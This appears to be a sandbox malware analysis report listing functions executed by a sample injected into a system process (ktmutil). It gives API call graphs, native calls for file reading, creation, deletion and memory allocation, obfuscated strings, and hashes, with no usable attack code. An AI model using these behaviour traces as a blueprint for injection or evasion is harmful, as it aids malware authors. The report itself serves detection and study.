3b534f 84445->84447 84461 3a1630 84445->84461 84447->84439 84449 3a2e5d 84448->84449 84451 3a2e76 84449->84451 84452 3b9af0 84449->84452 84451->84443 84453 3b9b0a 84452->84453 84454 3b5180 2 API calls 84453->84454 84456 3b9b30 84454->84456 84455 3b9b39 84455->84451 84456->84455 84457 3b86a0 LdrInitializeThunk 84456->84457 84458 3b9b99 84457->84458 84459 3bb180 RtlFreeHeap 84458->84459 84460 3b9bb2 84459->84460 84460->84451 84462 3a166b 84461->84462 84483 3a7b10 84462->84483 84464 3a1673 84465 3bb260 RtlAllocateHeap 84464->84465 84481 3a194d 84464->84481 84466 3a1689 84465->84466 84467 3bb260 RtlAllocateHeap 84466->84467 84468 3a169a 84467->84468 84469 3bb260 RtlAllocateHeap 84468->84469 84470 3a16a8 84469->84470 84494 3a5b80 84470->84494 84472 3a16b5 84473 3b5180 2 API calls 84472->84473 84476 3a16fb 84472->84476 84474 3a16e3 84473->84474 84475 3b5180 2 API calls 84474->84475 84475->84476 84482 3a1748 84476->84482 84500 3a6660 84476->84500 84478 3a4180 LdrLoadDll 84479 3a1902 84478->84479 84523 3b7c20 84479->84523 84481->84447 84482->84478 84484 3a7b3c 84483->84484 84485 3a7a00 2 API calls 84484->84485 84486 3a7b5f 84485->84486 84487 3a7b69 84486->84487 84488 3a7b81 84486->84488 84489 3a7b74 84487->84489 84491 3b9070 NtClose 84487->84491 84490 3a7b9d 84488->84490 84492 3b9070 NtClose 84488->84492 84489->84464 84490->84464 84491->84489 84493 3a7b93 84492->84493 84493->84464 84495 3a5b96 84494->84495 84497 3a5ba0 84494->84497 84495->84472 84496 3a5c86 84496->84472 84497->84496 84498 3b5180 2 API calls 84497->84498 84499 3a5d0c 84498->84499 84499->84472 84501 3a6685 84500->84501 84502 3a5f00 2 API calls 84501->84502 84503 3a66b9 84501->84503 84502->84503 84504 3a67d6 84503->84504 84505 3a6190 3 API calls 84503->84505 84504->84482 84506 3a674f 84505->84506 84507 3a675a 84506->84507 84508 3a6010 LdrInitializeThunk 84506->84508 84507->84482 84509 3a680d 84508->84509 84510 3a68c2 84509->84510 84512 3b9070 NtClose 84509->84512 84511 3a6190 3 API calls 84510->84511 84513 3a68d8 84511->84513 84517 3a6822 84512->84517 84514 3a6360 4 API calls 84513->84514 84516 3a68df 84513->84516 84515 3a691c 84514->84515 84515->84482 84516->84482 84518 3a6010 LdrInitializeThunk 84517->84518 84519 3a686d 84518->84519 84520 3b9070 NtClose 84519->84520 84521 3a6877 84520->84521 84522 3a6010 LdrInitializeThunk 84521->84522 84522->84510 84524 3b7c82 84523->84524 84526 3b7c8f 84524->84526 84527 3a1960 84524->84527 84526->84481 84543 3a7de0 84527->84543 84529 3a1980 84536 3a1ec4 84529->84536 84547 3b0dc0 84529->84547 84532 3a1b94 84534 3bc470 2 API calls 84532->84534 84533 3a19de 84533->84536 84550 3bc340 84533->84550 84537 3a1ba9 84534->84537 84535 3a7d80 LdrInitializeThunk 84539 3a1bf6 84535->84539 84536->84526 84537->84539 84555 3a0480 84537->84555 84539->84535 84539->84536 84540 3a0480 LdrInitializeThunk 84539->84540 84540->84539 84541 3a1d47 84541->84539 84542 3a7d80 LdrInitializeThunk 84541->84542 84542->84541 84544 3a7ded 84543->84544 84545 3a7e0e SetErrorMode 84544->84545 84546 3a7e15 84544->84546 84545->84546 84546->84529 84548 3bb0f0 NtAllocateVirtualMemory 84547->84548 84549 3b0de1 84547->84549 84548->84549 84549->84533 84551 3bc350 84550->84551 84552 3bc356 84550->84552 84551->84532 84553 3bb260 RtlAllocateHeap 84552->84553 84554 3bc37c 84553->84554 84554->84532 84556 3a0496 84555->84556 84559 3b9310 84556->84559 84560 3b932d 84559->84560 84563 2e42c70 LdrInitializeThunk 84560->84563 84561 3a04a2 84561->84541 84563->84561 84564 3b0f81 84565 3b0f84 84564->84565 84577 3b8ec0 84565->84577 84567 3b0fa2 84568 3b0fc0 84567->84568 84569 3b0fd5 84567->84569 84570 3b9070 NtClose 84568->84570 84571 3b9070 NtClose 84569->84571 84572 3b0fc9 84570->84572 84574 3b0fde 84571->84574 84573 3b1015 84574->84573 84575 3bb180 RtlFreeHeap 84574->84575 84576 3b1009 84575->84576 84578 3b8f6a 84577->84578 84579 3b8eee 84577->84579 84580 3b8f80 NtReadFile 84578->84580 84579->84567 84580->84567 84581 3b8fc0 84582 3b903a 84581->84582 84584 3b8fee 84581->84584 84583 3b9050 NtDeleteFile 84582->84583

              Executed Functions

              Function 00399B00 Relevance: 31.7, Strings: 25, Instructions: 422COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 28 399b00-399e82 29 399e93-399e9c 28->29 30 399e84-399e8d 28->30 31 399e9e-399eb0 29->31 32 399eb2-399ebc 29->32 30->29 31->30 33 399ecd-399ed6 32->33 34 399ed8-399eeb 33->34 35 399eed-399ef7 33->35 34->33 36 399f08-399f14 35->36 38 399f25-399f36 36->38 39 399f16-399f23 36->39 40 399f47-399f53 38->40 39->36 42 399f63-399f6d 40->42 43 399f55-399f61 40->43 44 399f7e-399f87 42->44 43->40 46 399f89-399f92 44->46 47 399f9f 44->47 48 399f9d 46->48 49 399f94-399f97 46->49 50 399fa6-399fad 47->50 48->44 49->48 52 399faf-399fcc 50->52 53 399fce 50->53 52->50 54 399fd5-399fd9 53->54 55 399fdb-39a000 54->55 56 39a002-39a00b 54->56 55->54 57 39a011-39a01b 56->57 58 39a247-39a24b 56->58 61 39a02c-39a038 57->61 59 39a24d-39a272 58->59 60 39a274-39a27b 58->60 59->58 62 39a3b1-39a3bb 60->62 63 39a281-39a29a 60->63 64 39a03a-39a046 61->64 65 39a056-39a06e 61->65 63->63 66 39a29c-39a2a0 63->66 69 39a048-39a04e 64->69 70 39a054 64->70 67 39a0de-39a0e5 65->67 68 39a070-39a07a 65->68 71 39a2cd call 3bade0 66->71 72 39a2a2-39a2aa 66->72 75 39a0e7-39a104 67->75 76 39a106-39a110 67->76 74 39a08b-39a097 68->74 69->70 70->61 85 39a2d2-39a2dc 71->85 77 39a2ac-39a2b0 72->77 78 39a2b1-39a2cb 72->78 80 39a099-39a0a5 74->80 81 39a0a7-39a0ab 74->81 75->67 82 39a121-39a12b 76->82 77->78 78->66 80->74 83 39a0d9 81->83 84 39a0ad-39a0d7 81->84 87 39a13b-39a14f 82->87 88 39a12d-39a139 82->88 83->58 84->81 90 39a2ed-39a2f6 85->90 89 39a160-39a16a 87->89 88->82 92 39a16c-39a1bc 89->92 93 39a1be-39a1c8 89->93 94 39a2f8-39a304 90->94 95 39a306-39a310 90->95 92->89 97 39a1d9-39a1e0 93->97 94->90 98 39a321-39a32a 95->98 100 39a20b-39a215 97->100 101 39a1e2-39a209 97->101 102 39a32c-39a33f 98->102 103 39a341-39a34b 98->103 105 39a226-39a232 100->105 101->97 102->98 106 39a35c-39a365 103->106 110 39a242 105->110 111 39a234-39a240 105->111 108 39a378-39a37f 106->108 109 39a367-39a376 106->109 108->62 112 39a381-39a3af 108->112 109->106 110->56 111->105 112->108
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: !$"$-[$/1$0n$3j$7$9$=$=y$?;$@J$I$K$Pa$T$V$WD$b$dM$u?$z($q$t$~
              • API String ID: 0-108677462
              • Opcode ID: 54297137325307ea6523086cb8941a21b4a288ae9b161d3f6d03a4f6ee694e65
              • Instruction ID: 587eb900efe3880e954fde60a1517ab1d80d4b40b226b358b1333050f1271e81
              • Opcode Fuzzy Hash: 54297137325307ea6523086cb8941a21b4a288ae9b161d3f6d03a4f6ee694e65
              • Instruction Fuzzy Hash: 43328FB0D05628CBEF25CF45C894BDDFBB2BB44308F1085DAD4096B281C7B95A89DF56
              Function 003AC270 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNELBASE(?,00000000), ref: 003AC354
              • FindNextFileW.KERNELBASE(?,00000010), ref: 003AC38F
              • FindClose.KERNELBASE(?), ref: 003AC39A
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: Find$File$CloseFirstNext
              • String ID:
              • API String ID: 3541575487-0
              • Opcode ID: 109021cd97ad8494effc6539568a49b3554d9e244c11c84696938d8e85b32137
              • Instruction ID: 2f85413b6d0c3e7c960d11fd9a87266d574ef22c852b6dd66d43962f96180ca6
              • Opcode Fuzzy Hash: 109021cd97ad8494effc6539568a49b3554d9e244c11c84696938d8e85b32137
              • Instruction Fuzzy Hash: C0316375900208BBEB22DF64CC86FFF777CEB45704F144558B918AB181DA74AA84CBA0
              Function 003B8D50 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
              Download Yara Rule
              APIs
              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 003B8E51
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 3aa1662ffb234809a80a3c7a6d824c6bcfbeb44a8c5fdfe23a266e5f422ffbc6
              • Instruction ID: 2169ac03b0d2093f63d2bc2b7e96d3f49871905d428d124687846f2e0dff948f
              • Opcode Fuzzy Hash: 3aa1662ffb234809a80a3c7a6d824c6bcfbeb44a8c5fdfe23a266e5f422ffbc6
              • Instruction Fuzzy Hash: 4431E7B1A00648AFDB14DF98D881EEE77B9EF8C314F108619F919A7340D730A801CBA1
              Function 003B8EC0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
              Download Yara Rule
              APIs
              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 003B8FA9
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: d3cdf02d8a8cf4b2e26f716c2950b15ece2f190f1681260e3066cae8aa6bae16
              • Instruction ID: 59cffe9e2f819cb3b622565a1123a6258d8dbfc9610fb392c279149c045d63f1
              • Opcode Fuzzy Hash: d3cdf02d8a8cf4b2e26f716c2950b15ece2f190f1681260e3066cae8aa6bae16
              • Instruction Fuzzy Hash: 8E31EAB5A00649AFDB14DF98D841EEFB7F9EF88314F108619F918AB340D770A911CBA1
              Function 003B91E0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
              Download Yara Rule
              APIs
              • NtAllocateVirtualMemory.NTDLL(003A19DE,?,003B7C8F,00000000,00000004,00003000,?,?,?,?,?,003B7C8F,003A19DE), ref: 003B92AB
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: b32a7c0d1dbbd573779880b42a4c6a8dd876dfe02e567570fb93f44313f231f4
              • Instruction ID: dc8f6ba19ef567d590da6c7444e812f16c74715843de58adcbfd8902994aa01f
              • Opcode Fuzzy Hash: b32a7c0d1dbbd573779880b42a4c6a8dd876dfe02e567570fb93f44313f231f4
              • Instruction Fuzzy Hash: 632159B1A00649ABDB14DF98DC41EEFB7B9EF88310F108509F918AB340D770A911CBA1
              Function 003B8FC0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 34eb003ce2ba49cb7e68d9d814fa4c122fd035dd9981de1c96b0e8b331ff87b6
              • Instruction ID: 187ce4303134ee58c586f6e9c8bcc37265b56ec60278316d9ffe6d9399575810
              • Opcode Fuzzy Hash: 34eb003ce2ba49cb7e68d9d814fa4c122fd035dd9981de1c96b0e8b331ff87b6
              • Instruction Fuzzy Hash: E411A371640709BED621EB58DC42FEB73ACEF85314F10850DFA48AB281EB71790187E1
              Function 003B9070 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
              Download Yara Rule
              APIs
              • NtClose.NTDLL(003B1461,?,00000000,?,?,003B1461,?), ref: 003B90A4
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 8841ba4d7763490741b4060c920f1954fa416d6dcd72ff7d8bb822730ced3ae9
              • Instruction ID: ac09139829e9af6c5305aa3946a490fcbaa62b2c4cdbf71012f37c3a476cef2e
              • Opcode Fuzzy Hash: 8841ba4d7763490741b4060c920f1954fa416d6dcd72ff7d8bb822730ced3ae9
              • Instruction Fuzzy Hash: D2E086722006047BD610EB5ADC41FDB77ACDFC5710F10851AFA0CAB142C671790487F0
              Function 02E44340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e90ccf685acc514572f06aa346f73e538559d372f6b104214b1ae966930d90c0
              • Instruction ID: de4adcaf939503084f8ac32c93b4e5520659d8dd192d67363810d49fe544446a
              • Opcode Fuzzy Hash: e90ccf685acc514572f06aa346f73e538559d372f6b104214b1ae966930d90c0
              • Instruction Fuzzy Hash: F1900231655810129580B1584885547400597E0301B55D011F5424554D8A148A969761
              Function 02E43090 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 5c20a71cef5f3b26d2be60ff85e90a4a3b1843d80ad16dae641c839457cf952d
              • Instruction ID: d49b404b698ab321a8aa007503ecf6f270b9fc898c1a566f7a88f493bb0f10a9
              • Opcode Fuzzy Hash: 5c20a71cef5f3b26d2be60ff85e90a4a3b1843d80ad16dae641c839457cf952d
              • Instruction Fuzzy Hash: 9190023129141802D580B15884157070006C7D0601F55D011B5024554E86168AA5AAB1
              Function 02E44650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 78ff0eed742f67a8f1d43adbab1250376ffe4a119762d3076a31d014bcae793b
              • Instruction ID: 01b9a5d2b1aaac6b69be5efa860ba05c684996f1e3978aee93320a42306f7ad3
              • Opcode Fuzzy Hash: 78ff0eed742f67a8f1d43adbab1250376ffe4a119762d3076a31d014bcae793b
              • Instruction Fuzzy Hash: FA9004717515104345C0F15C4C054077005D7F13013D5D115F5554570DC71CCDD5D77D
              Function 02E435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2f427e20be6c5468d5d99f28b5dbac3aba006dcdbb2e0393e06bbe958fbb3c54
              • Instruction ID: 8ddb52af493d974aba51e569877f5ec692b5401a073d3d174acd856880b9c02f
              • Opcode Fuzzy Hash: 2f427e20be6c5468d5d99f28b5dbac3aba006dcdbb2e0393e06bbe958fbb3c54
              • Instruction Fuzzy Hash: B190023165551402D540B1584515707100587D0201F65D411B5424568E87958A91A9A2
              Function 02E42AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: ef31bdfe98c8289de4665a423c8b944f3ba7fbe7a3d280e9263e6a5c3e929726
              • Instruction ID: 7430fcb87b08cfbe4341acb694939783d7f9395a105ad5e266da872ce763d7c8
              • Opcode Fuzzy Hash: ef31bdfe98c8289de4665a423c8b944f3ba7fbe7a3d280e9263e6a5c3e929726
              • Instruction Fuzzy Hash: AE900235271410020585F558060550B044597D6351395D015F6416590DC62189A59721
              Function 02E42AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 03c87d910c27cfc903ab31940036314ac6c06a2b83b004b15d8c71c74cda0963
              • Instruction ID: 251ae9d811fbd17e98c68ace60d38372bf7ce2dde12812c9d567fbb3458e4c4b
              • Opcode Fuzzy Hash: 03c87d910c27cfc903ab31940036314ac6c06a2b83b004b15d8c71c74cda0963
              • Instruction Fuzzy Hash: 55900435371410030545F55C07055070047C7D5351355D031F7015550DD731CDF1D531
              Function 02E42BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 999b584362eedae86022576fc5bf6a7e3cb501c9c165376697208051d0f88926
              • Instruction ID: 7f89cf40f5fca90966a4aaccdec901e99702c161baa042320cdbed0142c798cf
              • Opcode Fuzzy Hash: 999b584362eedae86022576fc5bf6a7e3cb501c9c165376697208051d0f88926
              • Instruction Fuzzy Hash: F190023125545842D580B1584405A47001587D0305F55D011B5064694E96258E95FA61
              Function 02E42BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: b754c028f5bc02162c960bcecddbce1212e06c06f6ceb9910cc3c0f090bfb98d
              • Instruction ID: 6a8225363b81528f94c44baaa80ec54551e0ef4de0ad2f8b60bd1d3db92a6604
              • Opcode Fuzzy Hash: b754c028f5bc02162c960bcecddbce1212e06c06f6ceb9910cc3c0f090bfb98d
              • Instruction Fuzzy Hash: 0190023125141802D5C0B158440564B000587D1301F95D015B5025654ECA158B99BBA1
              Function 02E42BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: d27e1eaec89c5cc89dff749fc9ecdc532bcbc73072879d74777e67583e74e056
              • Instruction ID: 668a0f2438036db2999a35f5e676714e01b61c1d947be608baac6fe0c3a96cdb
              • Opcode Fuzzy Hash: d27e1eaec89c5cc89dff749fc9ecdc532bcbc73072879d74777e67583e74e056
              • Instruction Fuzzy Hash: E790023165541802D590B1584415747000587D0301F55D011B5024654E87558B95BAA1
              Function 02E42B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 01fe5d020653b111c0149e08c15f52a0f577685bda0e8f1cff745fc5aef0acef
              • Instruction ID: b0b60fe4b979c7fea876ed9c60e0ed6054512d1331405820750512e093d1e59e
              • Opcode Fuzzy Hash: 01fe5d020653b111c0149e08c15f52a0f577685bda0e8f1cff745fc5aef0acef
              • Instruction Fuzzy Hash: D8900271252410034545B1584415617400A87E0201B55D021F6014590EC52589D1A525
              Function 02E439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 9573744eb3010b7056e15a27659a0cd2c3095eaf7577d3a575ddca8bc77483b7
              • Instruction ID: 319e1bc5156fcee079b5a70ddd470e4ed420759a900d335ae467d0ce43267086
              • Opcode Fuzzy Hash: 9573744eb3010b7056e15a27659a0cd2c3095eaf7577d3a575ddca8bc77483b7
              • Instruction Fuzzy Hash: 9090023129546102D590B15C44056174005A7E0201F55D021B5814594E85558995A621
              Function 02E42EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: dffa53de3971aa450a4acd0c6bcaea02caa64fe64cec90ca1985817460f549da
              • Instruction ID: ce103228e5e62e6ba23f9f178d8e10b663a30249e37ca6b55b17a49742254964
              • Opcode Fuzzy Hash: dffa53de3971aa450a4acd0c6bcaea02caa64fe64cec90ca1985817460f549da
              • Instruction Fuzzy Hash: CB90027125181403D580B5584805607000587D0302F55D011B7064555F8A298D91A535
              Function 02E42E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: f32f46fb54fd144336d660922f9ee0bc23f849c9aac5697dc13d217caf11ef43
              • Instruction ID: d941f339b2f2ec6ca148323d7e577ef42cbaf7600c2c7ecfa30174a6d25c261c
